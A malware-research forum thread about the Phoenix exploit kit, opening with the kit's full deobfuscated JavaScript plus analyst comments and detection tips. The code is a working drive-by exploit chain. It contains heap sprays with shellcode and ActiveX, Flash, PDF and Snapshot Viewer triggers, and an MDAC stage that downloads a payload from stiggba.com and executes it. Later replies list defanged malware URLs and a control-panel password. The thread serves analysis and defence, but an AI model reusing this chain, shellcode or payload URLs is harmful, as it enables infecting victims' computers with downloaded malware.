Author Topic: Phoenix exploit kit  (Read 15884 times)


September 15, 2009, 06:27:29 pm

WIEx

Description

http://translate.google.ru/translate?prev=hp&hl=ru&js=y&u=http%3A%2F%2Fwww.hack-info.ru%2Fshowthread.php%3Fp%3D311312&sl=auto&tl=en&history_state0=

Screenshot



Control panel

http://www.stiggba.com/phoenix/statistics.php
Exploits

http://www.stiggba.com/phoenix/index.php

Deobfuscated script (analyst-annotated):

/**
 * Stage targeting the AOL/Winamp "IWinAmpActiveX" control
 * (classid FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6, codebase fetched from pdl.stream.aol.com).
 *
 * Analyst notes (everything below is read directly from the code):
 *  - `shellcode` is the same %u-encoded blob reused by FLASH10() and DSHOW(). Decoding its
 *    trailing ASCII by hand from the escapes, it appears to embed the strings GetTempPathA,
 *    LoadLibraryA, GetProcAddress, WinExec, URLMON.DLL, URLDownloadToFileA, pdfupd.exe and a
 *    stiggba.com/phoenix/load.php?i=17 URL — confirm with a decoder before treating as an IoC.
 *  - The `bigblock` / `block` / `memory` section is a heap spray: 666 copies of a ~0x40000-char
 *    string made of a 0x0c0c slide followed by the shellcode.
 *  - `bof` is an oversized argument (1400 x "\xff" then 1000 x "\x0c") passed to ConvertFile()
 *    four times. It is declared without an initializer, so the string actually begins with the
 *    text "undefined".
 *  - Any exception moves the chain on to JAVA() and, after 3 s, DSHOW().
 *
 * Mitigation / detection: kill-bit the CLSID above, block the load.php host, and alert on
 * `unescape("%u…")` spray loops combined with ActiveX `classid` assignment.
 */
function AOL()
{
    try
    {
        var IWinAmpActiveX = document.createElement('object');
        IWinAmpActiveX.classid = 'clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6';
        IWinAmpActiveX.codebase = "http://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab";
        // Shared shellcode blob (see header note); the string is line-wrapped here by the forum paste.
        shellcode = unescape("%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%u
7869%u6c2f%u616f%u2e64%u6870%u3f70%u3d69%u3731%u9000");
        // Heap-spray setup: a 0x0c0c slide is grown to cover `slackspace`, then `block` is
        // expanded until one block (plus slack) reaches 0x40000 characters.
        bigblock = unescape("%u0c0c%u0c0c");
        headersize = 20;
        slackspace = headersize + shellcode.length;
        while (bigblock.length < slackspace) {
            bigblock += bigblock;
        }
        fillblock = bigblock.substring(0, slackspace);
        block = bigblock.substring(0, bigblock.length - slackspace);
        while (block.length + slackspace < 0x40000) {
            block = block + block + fillblock;
        }
        // 666 spray allocations of slide + shellcode.
        memory = new Array();
        for (i = 0; i < 666; i++) {
            memory[i] = block + shellcode;
        }
        // Oversized argument: no initializer, so it starts with the literal text "undefined".
        var bof;
        for (i = 0; i < 1400; i++) {
            bof = bof + unescape("%ff");
        }
        for (i = 0; i < 1000; i++) {
            bof = bof + unescape("%0c");
        }
        // The trigger call is repeated four times.
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
    }
    catch (e) {
        // Fallback chain: Java applet now, DirectShow stage after 3 seconds.
        JAVA();
        setTimeout('DSHOW()', 3000);
    }
}
/**
 * Flash 10 stage. Fingerprints the installed player through the
 * 'ShockwaveFlash.ShockwaveFlash.10' ActiveX object and GetVariable('$version').
 *
 * Analyst notes:
 *  - Only two exact builds are targeted: 'WIN 10,0,12,36' and 'WIN 10,0,22,87'. For those it
 *    injects an 18x18 iframe pointing at the relative path files/10.swf, then heap-sprays 0x600
 *    copies of a 0x8000-char (0x10000 / 2) string: a 0x0808 slide followed by `SC`.
 *  - `SC` is the same blob as in AOL()/DSHOW(); hand-decoding the trailing escapes suggests the
 *    embedded download URL here ends in load.php?i=18 — verify with a decoder.
 *  - Any other version, and any exception (e.g. no Flash ActiveX present), falls through to AOL().
 *
 * Mitigation / detection: the version probe and the `files/10.swf` iframe are both
 * signaturable; blocking the relative .swf and the load.php host breaks this stage.
 */
function FLASH10()
{
    try
    {
        sv = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.10').GetVariable('$version');
        if ((sv == 'WIN 10,0,12,36') || (sv == 'WIN 10,0,22,87'))
        {
            // Deliver the malicious SWF via a small iframe.
            var swf = document.createElement('iframe');
            swf.setAttribute('src', 'files/10.swf');
            swf.setAttribute('width', 18);
            swf.setAttribute('height', 18);
            document.body.appendChild(swf);
            var memory;
            var nop = unescape('%u0808%u0808');
            // Shared shellcode blob; line-wrapped by the forum paste.
            var SC = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%
u7869%u6c2f%u616f%u2e64%u6870%u3f70%u3d69%u3831%u9000');
            // Grow the slide past 0x8000 chars, then trim so slide + shellcode is exactly 0x8000.
            while (nop.length <= 0x10000 / 2) {
                nop += nop;
            }
            nop = nop.substring(0, 0x10000 / 2 - SC.length);
            // Heap spray: 0x600 allocations of slide + shellcode.
            memory = new Array();
            for (ass8995 = 0; ass8995 < 0x600; ass8995++) {
                memory[ass8995] = nop + SC;
            }
        }
        else {
            // Non-targeted Flash build: move on to the AOL/Winamp stage.
            AOL();
        }
    }
    catch (e) {
        // No Flash 10 ActiveX (or probe failed): same fallback.
        AOL();
    }
}
/**
 * "DirectShow" stage, reached from AOL()'s catch block via setTimeout('DSHOW()', 3000).
 *
 * Analyst notes:
 *  - `b` is the shared shellcode blob; hand-decoding its tail suggests the embedded URL ends
 *    in load.php?i=10 — verify with a decoder.
 *  - `c` is a 0x9090 slide (0x90 is the x86 NOP byte). The spray builds 350 copies of a
 *    ~0x70000-char slide + shellcode string into `h`.
 *  - The trigger is an <object> with classid 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF and
 *    data './img.png', appended to `j`. `j` is never defined anywhere in this script, so as
 *    pasted the appendChild call throws a ReferenceError before the object is attached.
 *  - Note the loop variable `i` is later re-declared with `var i` for the object element;
 *    because of hoisting both uses refer to the same local.
 *
 * Mitigation / detection: kill-bit the CLSID; the 0x9090 unescape plus a same-page
 * `classid` assignment is a strong spray indicator.
 */
function DSHOW()
{
    // Shared shellcode blob; line-wrapped by the forum paste.
    var b = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%u7869%u6c
2f%u616f%u2e64%u6870%u3f70%u3d69%u3031%u9000');
    // 0x90 NOP slide; same grow/trim/expand pattern as AOL(), but with a 0x70000 target.
    var c = unescape('%u9090%u9090');
    var d = 20;
    var e = d + b.length;
    while (c.length < e) {
        c += c;
    }
    var f = c.substring(0, e);
    var g = c.substring(0, c.length - e);
    while (g.length + e < 0x70000) {
        g = g + g + f;
    }
    // Heap spray: 350 allocations of slide + shellcode.
    var h = new Array();
    for (i = 0; i < 350; i++) {
        h[i] = g + b
    }
    // Trigger object. `j` is undefined in this script, so this line throws as pasted.
    var i = document.createElement('object');
    j.appendChild(i);
    i.width = '1';
    i.height = '1';
    i.data = './img.png';
    i.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
}
/**
 * First stage of the chain (called at the bottom of the script). Abuses an <object> with
 * classid BD96C556-65A3-11D0-983A-00C04FC29E36 — a CLSID commonly associated with
 * RDS.DataSpace — as a factory (CreateObject) for three COM objects: msxml2.XMLHTTP,
 * Shell.Application and adodb.stream.
 *
 * Behaviour visible in the code:
 *  1. GET http://stiggba.com/phoenix/load.php?i=1 synchronously.
 *  2. Write the binary responseBody into an adodb.stream and save it to './/..//file.exe'.
 *  3. Launch that file via Shell.Application.shellexecute.
 * Every failure path (object creation, download/save, execution) falls through to SWF().
 * Note that `t` is declared inside the inner try, so if the save block throws before
 * `var t` is assigned, shellexecute is still attempted with `t` undefined.
 *
 * Mitigation / detection: kill-bit the CLSID (MS06-014 era); alert on XMLHTTP → adodb.stream
 * → SaveToFile → shellexecute sequences from script, and block the load.php host.
 */
function MDAC()
{
    var p = document.createElement('object');
    // `id` is set to the element object itself, not a string — harmless quirk.
    p.setAttribute('id', p);
    p.setAttribute('classid', 'clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
    try
    {
        // Object factory via the control.
        var q = p.CreateObject('msxml2.XMLHTTP', '');
        var r = p.CreateObject('Shell.Application', '');
        var s = p.CreateObject('adodb.stream', '');
        try
        {
            // Binary stream; synchronous download of the payload.
            s.type = 1;
            q.open('GET', 'http://stiggba.com/phoenix/load.php?i=1', false);
            q.send();
            s.open();
            s.Write(q.responseBody);
            var t = './/..//file.exe';
            // Save with overwrite (mode 2).
            s.SaveToFile(t, 2);
            s.Close();
        }
        catch (e) {
            SWF();
        }
        try {
            // Execute the dropped file.
            r.shellexecute(t);
        }
        catch (e) {
            SWF();
        }
    }
    catch (e) {
        // Control not available / kill-bitted: next stage.
        SWF();
    }
}
/**
 * Snapshot Viewer stage, reached from PDF() when no Acrobat path applies.
 *
 * Analyst notes:
 *  - var1() enumerates drive letters C..Z (String.fromCharCode(65 + 2..26)) by loading
 *    res://<letter>:\Program Files\Outlook Express\msoeres.dll/#2/1 into an Image and
 *    checking for height == 59; this is a local-file/drive probe via the res: protocol.
 *    If no drive matches, the loop ends with var2 == 27 and the last value assigned is
 *    String.fromCharCode(91) == '[', which var5() uses as the "not found" sentinel.
 *  - var5(url) instantiates 'snpvw.Snapshot Viewer Control.1', points SnapshotPath at the
 *    remote URL (load.php?i=2) and CompressedPath at <drive>:\Program Files\Outlook Express\wab.exe,
 *    then calls PrintSnapshot() — i.e. it uses the control to write the download over wab.exe.
 *  - A 3 s interval waits for readyState == 4 and then navigates to 'ldap://'; the intent is
 *    presumably to have the ldap: handler start the overwritten wab.exe — inferred, not shown.
 *  - Every failure path falls through to FLASH10().
 *
 * Mitigation / detection: kill-bit the Snapshot Viewer control; res:// Image probes of
 * Program Files paths and an `ldap://` navigation from script are both signaturable.
 */
function SNAP()
{
    // Drive-letter probe (C..Z) using res:// loads of msoeres.dll.
    function var1()
    {
        for (var2 = 2, var3 = ''; var2 <= 26; var2++)
        {
            var3 = String.fromCharCode(65 + var2);
            var var4 = new Image();
            var4.src = 'res://' + var3 + ':\\' + 'Program Files' + '\\' + 'Outlook Express' + '\\' + 'msoeres.dll' + '/#2/1';
            if (var4.height == 59) {
                break;
            }
            var4 = '';
        }
        // Returns the matched drive letter, or '[' (charCode 91) when none matched.
        return var3;
    }
    function var5(url)
    {
        var var3 = var1();
        if (var3 == '[') {
            FLASH10();
            return;
        }
        try {
            var var6 = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
        }
        catch (e) {
            // `var6` is undefined here, so this comparison is always true and FLASH10() runs.
            if (var6 != '[object]') {
                FLASH10();
                return;
            }
        }
        // Remote source and local destination (wab.exe) for the control's "print".
        var6.SnapshotPath = url;
        try
        {
            var6.CompressedPath = var3 + ':\\' + 'Program Files' + '\\' + 'Outlook Express' + '\\' + 'wab.exe';
            var6.PrintSnapshot();
        }
        catch (e) {
            FLASH10();
        };
        // Poll every 3 s; once the control reports ready, navigate to ldap://.
        var var7 = setInterval(function ()
        {
            if (var6.readyState == 4) {
                clearInterval(var7);
                window.location = 'ldap://';
            }
        }, 3000);
    }
    var5('http://stiggba.com/phoenix/load.php?i=2');
}
/**
 * Flash 9 stage, reached from MDAC() on any failure.
 *
 * Probes 'ShockwaveFlash.ShockwaveFlash.9' for '$version' and, for six exact builds
 * (9,0,115,0 / 9,0,16,0 / 9,0,28,0 / 9,0,45,0 / 9,0,47,0 / 9,0,64,0), injects a 1x1 iframe
 * pointing at the relative path files/9i.swf. Any other version or any exception goes to PDF().
 *
 * Mitigation / detection: the exact-version allowlist and the `files/9i.swf` iframe are
 * signaturable; keeping Flash patched past these builds defeats this stage outright.
 */
function SWF()
{
    try
    {
        sv = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.9').GetVariable('$version');
        if ((sv == 'WIN 9,0,115,0') || (sv == 'WIN 9,0,16,0') || (sv == 'WIN 9,0,28,0') || (sv == 'WIN 9,0,45,0') || (sv == 'WIN 9,0,47,0') || (sv == 'WIN 9,0,64,0'))
        {
            // Deliver the malicious SWF via a 1x1 iframe.
            var swf = document.createElement("iframe");
            swf.setAttribute("src", "files/9i.swf");
            swf.setAttribute("width", 1);
            swf.setAttribute("height", 1);
            document.body.appendChild(swf);
        }
        else {
            PDF();
        }
    }
    catch (e) {
        // No Flash 9 ActiveX: next stage.
        PDF();
    }
}
/**
 * Java stage, reached from AOL()'s catch block. Writes an <applet> tag for Show.class
 * (relative to the page) into the document; the applet itself is not on this page.
 * Detection: document.write of an <applet> tag from an exploit page is a simple indicator.
 */
function JAVA()
{
    document.write("<applet code = 'Show.class' width='100' height='100'>");
}
/**
 * Navigates the top-most window (walks `parent` until it reaches itself, i.e. escapes any
 * framing) to `fn`, used by PDF() to load one of the malicious PDF files.
 * @param {string} fn - Relative PDF path (files/geticon.pdf, files/printf.pdf, files/collab.pdf).
 */
function SHOWPDF(fn)
{
    wind = window;
    while (wind.parent != wind) {
        wind = wind.parent;
    }
    wind.location = fn;
}
/**
 * Adobe Reader stage, reached from SWF().
 *
 * Writes an <OBJECT> with classid CA8A9780-280D-11CF-A24D-444553540000 (the Acrobat browser
 * control) and calls GetVersions(). The version string is split on ',', the 5th field is
 * split on '=', and its value becomes `lv` (e.g. '8.1.2'); `sv` is its major number.
 *
 * Routing visible in the code:
 *  - lv == '9.0.0' or '8.1.2'  → files/geticon.pdf
 *  - major 6..8: lv == '7.1.0' → files/printf.pdf, otherwise files/collab.pdf
 *  - any other major, or any exception → SNAP()
 * Note the two `if`s are not chained, so an '8.1.2' install calls SHOWPDF() twice
 * (geticon.pdf, then collab.pdf). `sv <= 8` compares a string with a number via coercion.
 *
 * Mitigation / detection: the three relative PDF names and the GetVersions() probe are
 * signaturable; a patched Reader falls through to SNAP().
 */
function PDF()
{
    try
    {
        document.write('<OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>');
        // Parse Reader's version string down to the 5th comma-separated "key=value" entry.
        var lv = Pdf1.GetVersions();
        lv = lv.split(',');
        lv = lv[4].split('=');
        lv = lv[1];
        sv = lv.split('.');
        sv = sv[0];
        if ((lv == '9.0.0') || (lv == '8.1.2')) {
            SHOWPDF('files/geticon.pdf');
        }
        if ( (sv <= 8) && (sv >= 6) ) {
            if (lv == '7.1.0') {
                SHOWPDF('files/printf.pdf');
            }
            else {
                SHOWPDF('files/collab.pdf');
            }
        }
        else {
            SNAP();
        }
    }
    catch (e) {
        // Acrobat control absent or GetVersions failed: next stage.
        SNAP();
    }
}
// Entry point. The visible fallback order is:
// MDAC() -> SWF() -> PDF() -> SNAP() -> FLASH10() -> AOL() -> JAVA() + DSHOW().
MDAC();

/EDIT by SysAdMini: Wepawet link added
http://wepawet.cs.ucsb.edu/view.php?hash=0299f11465b1f9188d9ed2fe5b4841a1&type=js

September 16, 2009, 07:07:06 am
Reply #1

SysAdMini


September 16, 2009, 01:24:59 pm
Reply #2

WIEx

SysAdMini,  ;)

Control Panel

stikkso.com/phoenix/statistics.php

password - parrot

September 16, 2009, 05:04:23 pm
Reply #3

h4h4h4h4

SysAdMini,  ;)

Control Panel

stikkso.com/phoenix/statistics.php

password - parrot

That's cool. Why would they be so stupid as to not change their password? I'm guessing that's the default password. Looks like we could go in and reset their stats and mess them up if we wanted to, LOL.

September 16, 2009, 05:18:13 pm
Reply #4

SysAdMini

That's cool. Why would they be so stupid as to not change their password? I'm guessing that's the default password. Looks like we could go in and reset their stats and mess them up if we wanted to, LOL.

Please don't reset any stats. Stats are interesting for researchers.

September 16, 2009, 09:32:52 pm
Reply #5

h4h4h4h4

That's cool. Why would they be so stupid as to not change their password? I'm guessing that's the default password. Looks like we could go in and reset their stats and mess them up if we wanted to, LOL.

Please don't reset any stats. Stats are interesting for researchers.

Yep sounds good.


August 04, 2010, 06:15:46 am
Reply #7

SysAdMini


August 18, 2010, 06:37:57 pm
Reply #8

SysAdMini


August 24, 2010, 04:02:42 pm
Reply #9

detro

Current Phoenix exploit kit campaigns being pushed today,

hxxp://nevoex65eo.com/ab/tmp/des.jar — I have not yet been able to locate the control panel or payload, but here is the Java exploit.

 and

hxxp://79.135.152.217/a/tmp/des.jar, which is already listed on MDL here: http://www.malwaredomainlist.com/mdl.php?search=79.135.152.217&colsearch=All&quantity=50

It appears these are going out in tandem, as I am seeing them appear on multiple client networks simultaneously.


The t's have been converted to x's to protect the innocent.

September 03, 2010, 09:06:51 pm
Reply #10

SysAdMini


September 07, 2010, 03:35:10 am
Reply #11

crunchtime

Yet another libtiff.pdf sample from this kit:

hxxp://ethdem.com/ddt/tmp/libtiff.pdf

Some info on this domain is already on the list: http://www.malwaredomainlist.com/mdl.php?search=ethdem.com&colsearch=All&quantity=50

*Edit*
One more: hxxp://www.finworldonline.com/news/tmp/libtiff.pdf

September 08, 2010, 04:24:16 pm
Reply #12

crunchtime

One more sample:

hxxp://mypetitebusiness.org/2/tmp/libtiff.pdf

October 04, 2010, 01:21:56 pm
Reply #13

GmG

New phoenix ?
gotrue.cz.cc/tk/

gotrue.cz.cc/tk/u.asx

It is identical to

http://popunder777.com/pek/tmp/u.asx


November 17, 2010, 10:33:04 pm
Reply #14

pstash

Does anyone know where I could find a readme.txt file for this kit? I have a couple of versions of the kit and want to do some analysis on them. The readme file in one of the versions is garbled, probably because it was originally written in Russian.